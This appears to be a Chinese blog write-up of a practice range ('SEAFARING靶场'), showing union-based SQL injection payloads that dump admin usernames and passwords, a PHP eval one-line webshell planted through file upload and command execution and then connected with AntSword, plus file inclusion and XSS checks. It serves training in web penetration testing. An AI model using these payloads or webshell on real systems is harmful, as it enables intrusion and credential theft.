当前位置: 首页 > article >正文

SEAFARING靶场渗透

一.SQL注入漏洞

1.输入id=1 --+ 下方出现数据说明闭合成功

2.测试得出数据库有三列

 

3.三处都是回显点

 

4.联合查询爆出库名

 

5.查表名

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='test'--+ 

 

6.查字段名

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='test' and table_name='admin'--+ 

 

7. 查出用户名和密码

?id=-1 union select 1,group_concat(user_name,'~',user_pass),3 from admin--+ 

 

二.文件上传漏洞

1.用我们刚才获取的用户名和密码登录后发现可以上传文件

 

2.上传一句话木马进去

 

3.将文件地址拼接到网址后进行访问

 

4.使用蚁剑连接

 

三.命令执行漏洞

1.网址下方的输入框提示我们可以执行命令

 

2.尝试输入ls有效

 

3.借助这个漏洞我们写一句话木马到888.php 并访问

echo '<?php @eval($_POST[cmd]);?>' > 888.php 

 

4.复制地址用蚁剑连接

 

四.文件包含漏洞

1.修改刚才传入的888.php内容为phpinfo();重新上传访问后发现远程文件包含是关闭的,只能使用本地文件包含

 

2.访问php文件复制地址蚁剑连连接即可

 

五.XSS漏洞

在登录框中测试有没有XSS漏洞,成功弹窗

 

 


http://www.kler.cn/news/308793.html

相关文章:

  • # 深度学习笔记(6)Hugginface -Transformer
  • 重生之我在Java世界------学单例设计模式
  • [使用ElasticsearchEmbeddingsCache实现高效存储和检索:完整指南]
  • 滑坡落石检测数据集
  • [掌握API速率限制:如何高效管理请求频率]
  • HarmonyOS开发实战( Beta5.0)橡皮擦案例实践详解
  • 蓝桥杯-STM32G431RBT6(UART解析字符串sscanf和解决串口BUG)
  • 【Java EE】文件IO
  • java线程池编程示例
  • python-桌面软件自动化(一)(实战微信发消息)
  • glb数据格式
  • macOS平台TextRank环境配置
  • rk3568 Android12 增加 USB HOST 模式开关(二)
  • JVM面试真题总结(十二)
  • Nginx 跨域 + 无法设置 Cookie 解决办法
  • 计算机网络17——IM聊天系统——客户端核心处理类框架搭建
  • 基于web的 BBS论坛管理系统设计与实现
  • 【AI学习笔记】初学机器学习西瓜书概要记录(一)机器学习基础知识篇
  • 苍穹外卖Day01-2
  • 机器人的静力分析与动力学
  • vue中解决上个路由的el-dialog遮罩层未关闭问题
  • mqtt整体了解
  • python实现多个pdf文件合并
  • 二十三种设计模式之适配器模式
  • 单调队列,LeetCode 2398. 预算内的最多机器人数目
  • ai 回答HFS是什么 HTTP的文件服务器是什么
  • 数据结构之排序算法的分析和应用
  • 【数据结构篇】~链表算法题3(环形链表)
  • C# net跨平台上位机开发(avalonia)附demo源码
  • 牛客背包问题练习 xinjun与阴阳师